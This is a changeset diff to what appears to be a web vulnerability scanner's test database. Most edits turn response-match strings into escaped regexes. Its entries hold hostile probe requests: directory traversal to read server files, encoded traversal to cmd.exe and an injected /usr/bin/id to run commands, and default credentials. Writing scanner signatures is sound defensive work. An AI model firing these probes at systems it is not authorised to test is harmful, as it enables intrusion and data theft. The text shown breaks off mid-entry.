Changeset 591
- Timestamp:
- 12/29/2010 02:27:07 AM (2 years ago)
- File:
-
- 1 edited
-
trunk/plugins/db_tests (modified) (93 diffs)
Legend:
- Unmodified
- Added
- Removed
-
trunk/plugins/db_tests
r590 r591 62 62 "000035","0","3","@CGIDIRSphoto/protected/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.","","" 63 63 "000036","0","3","@CGIDIRSwrap.cgi","GET","200","","","","","possible variation: comes with IRIX 6.2; allows to view directories","","" 64 "000037","0","3","/./","GET","include\ (\"","","","","","Appending '/./' to a directory may reveal PHP source code.","",""64 "000037","0","3","/./","GET","include\\\(\"","","","","","Appending '/./' to a directory may reveal PHP source code.","","" 65 65 "000038","637","23","/~root/","GET","200","","","","","Allowed to browse root's home directory.","","" 66 66 "000039","0","3","/cgi-bin/wrap","GET","200","","","","","comes with IRIX 6.2; allows to view directories","","" … … 76 76 "000049","3233","3","/imp/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" 77 77 "000050","0","3","/imp/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" 78 "000051","0","3","/index.html.bak","GET"," index of ","","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","",""79 "000052","0","3","/index.html~","GET"," index of ","","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","",""80 "000053","621","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv .conf","","","","","phpMyExplorer allows attackers to read directories on the server.","",""78 "000051","0","3","/index.html.bak","GET","[Ii]ndex [Oo]f ","","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","","" 79 "000052","0","3","/index.html~","GET","[Ii]ndex [Oo]f ","","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","","" 80 "000053","621","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv\.conf","","","","","phpMyExplorer allows attackers to read directories on the server.","","" 81 81 "000054","8103","23","/global.inc","GET","200","","","","","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php","","" 82 82 "000055","0","3b","@CGIDIRSformmail.pl","GET","200","","","","","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.","","" … … 112 112 "000085","0","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","","" 113 113 "000086","0","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" 114 "000087","2686","3","@CGIDIRScart.pl?db='","GET","c:\\ ","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""115 "000088","2686","3","@CGIDIRScart.pl?db='","GET","d:\\ ","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","",""116 "000089","292","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\ /\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","",""114 "000087","2686","3","@CGIDIRScart.pl?db='","GET","c:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" 115 "000088","2686","3","@CGIDIRScart.pl?db='","GET","d:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" 116 "000089","292","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\\\/\\\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","","" 117 117 "000090","0","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" 118 118 "000091","0","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" 119 119 "000092","0","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","","" 120 120 "000093","0","3","/index.php/123","GET","Premature end of script headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.","","" 121 "000094","7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in /","","","","","Mambo Site Server 4.0.11 reveals the web server path.","",""121 "000094","7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in \/","","","","","Mambo Site Server 4.0.11 reveals the web server path.","","" 122 122 "000095","23654","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","","" 123 123 "000096","0","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","","" … … 152 152 "000125","0","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizard allows password files to be read remotely.","","" 153 153 "000126","0","3","/blah_badfile.shtml","GET","200","","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->","" 154 "000127","0","3","/blah-whatever-badfile.jsp","GET","Script /","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","",""154 "000127","0","3","/blah-whatever-badfile.jsp","GET","Script \/","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","","" 155 155 "000128","4910","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","","" 156 156 "000129","0","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attackers to view host info. Use perlis.dll instead.","","" … … 190 190 "000163","51201","3","/password.inc","GET","globalpw","","","","","GTCatalog 0.9 admin password was retrieved remotely.","","" 191 191 "000164","0","3","/PDG_Cart/oder.log","GET","200","","","","","Shopping cart software log","","" 192 "000165","0","3","/web-console/ServerInfo.jsp%00","GET","< %=","","","","","jboss 3.2.1 with jetty seems to disclose source code.","",""192 "000165","0","3","/web-console/ServerInfo.jsp%00","GET","<\%=","","","","","jboss 3.2.1 with jetty seems to disclose source code.","","" 193 193 "000166","0","3","/global.asa","GET","RUNAT","","","","","The global.asa file was retrieved, which may contain sensitive information. Map the .asa extension to the proper dll.","","" 194 194 "000167","0","23","/exchange/lib/AMPROPS.INC","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" … … 210 210 "000183","0","8","/w-agora/","GET","200","","","","","w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.","","" 211 211 "000184","42680","a","/vider.php3","GET","200","","","","","MySimpleNews may allow deleting of news items without authentication.","","" 212 "000185","0","a","/exchange/root.asp?acs=anon","GET"," /exchange/logonfrm.asp","","","","","This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","",""212 "000185","0","a","/exchange/root.asp?acs=anon","GET","\/exchange\/logonfrm\.asp","","","","","This allows anonymous access to portions of the OWA server. http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","","" 213 213 "000186","6181","a","/officescan/cgi/cgiChkMasterPwd.exe","GET","200","","","","","Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.","","" 214 214 "000187","0","b","/%NETHOOD%/","GET","Microsoft Windows Network","","","","","The machine may be infected with the Bugbear.B virus. http://www.f-secure.com/v-descs/bugbear_b.shtml","","" … … 287 287 "000260","11093","3","@CGIDIRS%2e%2e/abyss.conf","GET","200","","","","","The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/","","" 288 288 "000261","2396","3","@CGIDIRSdata/fetch.php?page=","GET","mysql_num_rows","","","","","Stellar Docs allows remote users to see file system paths. BID-8385.","","" 289 "000262","0","3","@CGIDIRSempower?DB=whateverwhatever","GET","db name whateverwhatever of directory /","","","","","This CGI allows attackers to learn the full system path to your web directory.","",""289 "000262","0","3","@CGIDIRSempower?DB=whateverwhatever","GET","db name whateverwhatever of directory \/","","","","","This CGI allows attackers to learn the full system path to your web directory.","","" 290 290 "000263","0","3","@CGIDIRSmrtg.cgi?cfg=blah","GET","Cannot find the given config file","","","","","Multi Router Traffic Grapher (mrtg.org) reveals system paths when an invalid config file is specified. Software should be upgraded to the latest version.","","" 291 291 "000264","5734","3","@CGIDIRSstore/agora.cgi?page=whatever33.html","GET","FILE:","","","","","Agora.cgi gives detailed error messages including file system paths.","","" 292 "000265","59658","3","/?mod=node&nid=some_thing&op=view","GET"," /node.module.php","","","","","Sage 1.0b3 may reveal system paths with invalid module names.","",""293 "000266","59658","3","/?mod=some_thing&op=browse","GET","in /","","","","","Sage 1.0b3 reveals system paths with invalid module names.","",""292 "000265","59658","3","/?mod=node&nid=some_thing&op=view","GET","\/node\.module\.php","","","","","Sage 1.0b3 may reveal system paths with invalid module names.","","" 293 "000266","59658","3","/?mod=some_thing&op=browse","GET","in \/","","","","","Sage 1.0b3 reveals system paths with invalid module names.","","" 294 294 "000267","7170","3","/article.php?article=4965&post=1111111111","GET","Unable to jump to row","","","","","PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent.","","" 295 295 "000268","0","3","/blah123.php","GET","Failed opening ","","","","","PHP is configured to give descriptive error messages that can reveal file system paths.","","" 296 296 "000269","12649","3","/categorie.php3?cid=june","GET","Unable to jump to row","","","","","Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent.","","" 297 "000270","3233","3","/CFIDE/probe.cfm","GET","coldfusion .tagext.lang","","","","","Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info","",""297 "000270","3233","3","/CFIDE/probe.cfm","GET","coldfusion\.tagext\.lang","","","","","Cold Fusion file probe.cfm reveals system information, such as the path to the web server. In the 'Debugging Settings' page in the Administrator console, suppress the installation path displayed in error messages by selecting 'Enable Robust Exception Info","","" 298 298 "000271","0","3","/contents.php?new_language=elvish&mode=select","GET","200","","","","","Requesting a file with an invalid language selection from DC Portal may reveal the system path.","","" 299 299 "000272","0","3","/download.php?op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","","" … … 301 301 "000274","59400","3","/examples/basic/servlet/HelloServlet","GET","The source of this servlet is in","","","","","Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet.","","" 302 302 "000275","5289","3","/home.php?arsc_language=elvish","GET","Failed opening '","","","","","ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified.","","" 303 "000276","0","3","/hostadmin/?page='","GET","C:\\ ","","","","","Host Admin reveals install location and other sensitive information.","",""304 "000277","0","3","/hostadmin/?page='","GET","D:\\ ","","","","","Host Admin reveals install location and other sensitive information.","",""303 "000276","0","3","/hostadmin/?page='","GET","C:\\\\","","","","","Host Admin reveals install location and other sensitive information.","","" 304 "000277","0","3","/hostadmin/?page='","GET","D:\\\\","","","","","Host Admin reveals install location and other sensitive information.","","" 305 305 "000278","0","3","/index.php?file=index.php","GET","Fatal error:","","","","","PHP-Nuke 5.4 allows file system paths to be shown in error messages.","","" 306 306 "000279","40589","3","/jgb_eng_php3/cfooter.php3","GET","Fatal error","","","","","Justice Guestbook may reveal file system paths in error messages.","","" 307 "000280","0","3","/JUNK(5).csp","GET","File not found: /","","","","","Invalid files with .csp extension reveal the file system path to the web root.","",""307 "000280","0","3","/JUNK(5).csp","GET","File not found: \/","","","","","Invalid files with .csp extension reveal the file system path to the web root.","","" 308 308 "000281","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Failed opening","","","","","PHP-Nuke allows file system paths to be revealed.","","" 309 309 "000282","0","3","/modules.php?name=Downloads&d_op=viewdownload","GET","Fatal error","","","","","PHP-Nuke allows file system paths to be revealed.","","" … … 311 311 "000284","0","3","/modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid=","GET","non-object in","","","","","Postnuke v0.7.2.3-Phoenix and below reveal the file system path.","","" 312 312 "000285","0","3","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink","GET","Failed opening ","","","","","PHP-Nuke is configured to give descriptive error messages that can reveal file system paths.","","" 313 "000286","2394","3","/path/nw/article.php?id='","GET","c: /","","","","","News Wizard 2.0 reveals the file system path.","",""314 "000287","2394","3","/path/nw/article.php?id='","GET","d: /","","","","","News Wizard 2.0 reveals the file system path.","",""313 "000286","2394","3","/path/nw/article.php?id='","GET","c:\/","","","","","News Wizard 2.0 reveals the file system path.","","" 314 "000287","2394","3","/path/nw/article.php?id='","GET","d:\/","","","","","News Wizard 2.0 reveals the file system path.","","" 315 315 "000288","6467","3","/pw/storemgr.pw","GET","200","","","","","Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.","","" 316 316 "000289","4245","3","/rtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","","" … … 326 326 "000299","53386","3","/vchat/msg.txt","GET","200","","","","","VChat allows user information to be retrieved.","","" 327 327 "000300","4907","3","/vgn/license","GET","200","","","","","Vignette server license file found.","","" 328 "000301","3092","3","/web.config","GET","< ?xml version","","200","","","ASP config file is accessible.","",""328 "000301","3092","3","/web.config","GET","<\?xml version","","200","","","ASP config file is accessible.","","" 329 329 "000302","3233","3","/webamil/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" 330 330 "000303","0","3","/webcart-lite/config/import.txt","GET","200","","","","","This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.","","" … … 350 350 "000323","0","3","/trace.axd","GET","Application Trace","","","","","The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.","","" 351 351 "000324","0","3","/tvcs/getservers.exe?action=selects1","GET","200","","","","","Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.","","" 352 "000325","0","3","/whatever.htr","GET","<html>Error: The requested file could not be found . </html>","200","","","","May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)","",""353 "000327","0","3","/./","GET"," Index of ","","","","","Appending '/./' to a directory allows indexing","",""352 "000325","0","3","/whatever.htr","GET","<html>Error: The requested file could not be found\. <\/html>","200","","","","May reveal physical path. htr files may also be vulnerable to an off-by-one overflow that allows remote command execution (see MS02-018)","","" 353 "000327","0","3","/./","GET","[Ii]ndex [Oo]f ","","","","","Appending '/./' to a directory allows indexing","","" 354 354 "000328","0","3","/nsn/fdir.bas:ShowVolume","GET","200","","","","","You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in","","" 355 355 "000329","0","3","/nsn/fdir.bas","GET","200","","","","","You can use fdir to ShowVolume and ShowDirectory.","","" 356 "000330","0","3","/servlet/webacc?User.html=noexist","GET","templates /","","","","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","",""356 "000330","0","3","/servlet/webacc?User.html=noexist","GET","templates\/","","","","","Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.","","" 357 357 "000331","0","4","/forum/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" 358 358 "000332","0","4","/webmail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" … … 420 420 "000394","0","1","@CGIDIRSuptime","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" 421 421 "000395","0","1","@CGIDIRSwais.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","","" 422 "000396","0","2","//","GET"," index of ","","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","",""423 "000397","0","2","/webtop/wdk/","GET","Directory Listing for /wdk/","","","","","Documentum Webtop Server appears to be installed","",""424 "000398","17113","2","/SilverStream","GET"," /Pages","","","","","SilverStream allows directory listing","",""422 "000396","0","2","//","GET","[Ii]ndex [Oo]f ","","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","","" 423 "000397","0","2","/webtop/wdk/","GET","Directory Listing for \/wdk\/","","","","","Documentum Webtop Server appears to be installed","","" 424 "000398","17113","2","/SilverStream","GET","\/Pages","","","","","SilverStream allows directory listing","","" 425 425 "000399","0","2","/signon","GET","Administrator Login","","","","","Tivoli administrator login found. Test the default login of admin/admin. Tivoli allows system administration.","","" 426 426 "000400","0","2","/upd/","GET","200","","","","","WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.","","" … … 430 430 "000404","0","3","/cfdocs/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS","","" 431 431 "000405","0","3","/CVS/Entries","GET","200","","","","","CVS Entries file may contain directory listing information.","","" 432 "000406","0","3","/lpt9.xtp","GET","java .io.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","",""433 "000407","8450","3","/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file .</font></p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","",""434 "000408","8450","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file .</font></p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","",""432 "000406","0","3","/lpt9.xtp","GET","java\.io\.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","","" 433 "000407","8450","3","/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file \.<\/font><\/p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","","" 434 "000408","8450","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file \.<\/font><\/p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","","" 435 435 "000409","0","3","/asp/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" 436 436 "000410","0","3","/asp/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" … … 439 439 "000413","0","3","/ISSamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" 440 440 "000414","0","3","/ISSamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" 441 "000415","0","3","/junk.aspx","GET","NET Framework Version:",""," [FileNotFoundException]:","","","ASP.NET reveals its version in invalid .aspx error messages.","",""441 "000415","0","3","/junk.aspx","GET","NET Framework Version:","","\[FileNotFoundException\]:","","","ASP.NET reveals its version in invalid .aspx error messages.","","" 442 442 "000416","0","3","/oc/Search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" 443 443 "000417","0","3","/oc/Search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","","" … … 451 451 "000425","15455","3","@CGIDIRScom5.java","GET","Execution of","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" 452 452 "000426","15455","3","@CGIDIRScom5.pl","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","","" 453 "000427","0","3","/?Open","GET"," .nsf","","","","","This displays a list of all databases on the server. Disable this capability via server options.","",""454 "000428","0","3","/?OpenServer","GET","\ /icons\/abook\.gif","","","","","This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html","",""453 "000427","0","3","/?Open","GET","\.nsf","","","","","This displays a list of all databases on the server. Disable this capability via server options.","","" 454 "000428","0","3","/?OpenServer","GET","\\\/icons\\\/abook\\\.gif","","","","","This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html","","" 455 455 "000429","0","3","/catalog.nsf","GET","200","","","","","A list of server databases can be retrieved, as well as a list of ACLs.","","" 456 456 "000430","0","3","/cersvr.nsf","GET","200","","","","","Server certificate data can be accessed remotely.","","" 457 "000431","50","3","/cgi-bin/testing_whatever","GET","domino /cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","",""457 "000431","50","3","/cgi-bin/testing_whatever","GET","domino\/cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","","" 458 458 "000432","0","3","/domlog.nsf","GET","200","","","","","The domain server logs can be accessed remotely.","","" 459 459 "000433","0","3","/events4.nsf","GET","200","","","","","The events log can be accessed remotely.","","" … … 469 469 "000443","0","3","@CGIDIRStest-env","GET","200","","","","","May echo environment variables or give directory listings","","" 470 470 "000444","57612","3","/.perf","GET","ListenSocket","","","","","Contains Netscape/iPlanet server performance information","","" 471 "000445","122","3","/","get"," Index of ","","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","",""472 "000446","0","3","/","INDEX"," Index of ","","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","",""471 "000445","122","3","/","get","[Ii]ndex [Oo]f ","","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","","" 472 "000446","0","3","/","INDEX","[Ii]ndex [Oo]f ","","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","","" 473 473 "000447","0","3","//","GET","Proxy autoconfig","","","","","Proxy auto configuration file retrieved.","","" 474 474 "000448","0","3","/admin-serv/config/admpw","GET","200","","","","","This file contains the encrypted Netscape admin password. It should not be accessible via the web.","","" 475 "000449","39140","3","/test.php%20","GET","< ?php","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version.","",""476 "000450","0","3","/*.*","GET"," index of ","","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","",""475 "000449","39140","3","/test.php%20","GET","<\?php","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version.","","" 476 "000450","0","3","/*.*","GET","[Ii]ndex [Oo]f ","","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" 477 477 "000451","0","3","/cgi-bin/cgi_process","GET","200","","","","","WASD reveals a lot of system information in this script. It should be removed.","","" 478 478 "000452","0","3","/ht_root/wwwroot/-/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" 479 "000453","0","3","/JUNK(10)","GET","Document not found .../","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","",""479 "000453","0","3","/JUNK(10)","GET","Document not found \.\.\. \/","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","","" 480 480 "000454","0","3","/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","","" 481 481 "000455","0","3","/tree","GET","200","","","","","WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","","" 482 "000456","0","3","@CGIDIRSindex.js0x70","GET","\ <\%\=","","","","","Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.","",""483 "000457","576","3","/%00/","GET","< %","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","",""482 "000456","0","3","@CGIDIRSindex.js0x70","GET","\\<\\\%\\=","","","","","Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.","","" 483 "000457","576","3","/%00/","GET","<\%","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","","" 484 484 "000458","576","3","/%00/","GET","directory listing of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","","" 485 "000459","576","3","/%00/","GET"," index of ","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","",""486 "000460","576","3","/%2e/","GET","< %","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""485 "000459","576","3","/%00/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","","" 486 "000460","576","3","/%2e/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" 487 487 "000461","576","3","/%2e/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" 488 "000462","576","3","/%2e/","GET"," index of ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""489 "000463","576","3","/%2f/","GET","< %","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""488 "000462","576","3","/%2e/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" 489 "000463","576","3","/%2f/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" 490 490 "000464","576","3","/%2f/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" 491 "000465","576","3","/%2f/","GET"," index of ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""492 "000466","576","3","/%5c/","GET","< %","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""491 "000465","576","3","/%2f/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" 492 "000466","576","3","/%5c/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","","" 493 493 "000467","576","3","/%5c/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" 494 "000468","576","3","/%5c/","GET"," index of ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""495 "000469","576","3","/index.jsp%00x","GET","< %=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k. BID-2513","",""496 "000470","3268","2","/weblogic","GET"," index of ","","","","","Directory indexing found.","",""497 "000471","0","3","/%a%s%p%d","GET"," *s?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","",""494 "000468","576","3","/%5c/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","","" 495 "000469","576","3","/index.jsp%00x","GET","<\%=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k. BID-2513","","" 496 "000470","3268","2","/weblogic","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 497 "000471","0","3","/%a%s%p%d","GET","\*s\?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","","" 498 498 "000472","0","3","/index.html%20","GET","File for URL","","","","","Website may reveal file system paths by adding %20 to the end of a legitimate .html request.","","" 499 499 "000473","0","23","/852566C90012664F","GET","200","","","","","This database can be read using the replica ID without authentication.","","" … … 517 517 "000492","0","8","/cgi-bin/snorkerz.bat","GET","200","","","","","Arguments passed to DOS CGI without checking","","" 518 518 "000493","0","8","/cgi-bin/snorkerz.cmd","GET","200","","","","","Arguments passed to DOS CGI without checking","","" 519 "000494","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET"," [winnt]","","","Internal server error","","Can issue arbitrary commands to host.","",""519 "000494","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","\[winnt\]","","","Internal server error","","Can issue arbitrary commands to host.","","" 520 520 "000495","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","The paramater is incorrect","","","Internal server error","","May be able to issue arbitrary commands to host.","","" 521 521 "000496","0","8","/msadc/samples/adctest.asp","GET","Remote Data Service","","","","","The IIS sample application adctest.asp may be used to remotely execute commands on the server. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","","" … … 529 529 "000504","724","8","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","","" 530 530 "000505","0","2","/goform/CheckLogin?login=root&password=tslinux","GET","MainPageTable","","","","","The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.","","" 531 "000506","57324","5","/[SecCheck]/..%2f../ext.ini","GET"," [SERVICES]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""532 "000507","57324","5","/[SecCheck]/..%255c..%255c../ext.ini","GET"," [SERVICES]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""533 "000508","57324","5","/[SecCheck]/..%252f..%252f../ext.ini","GET"," 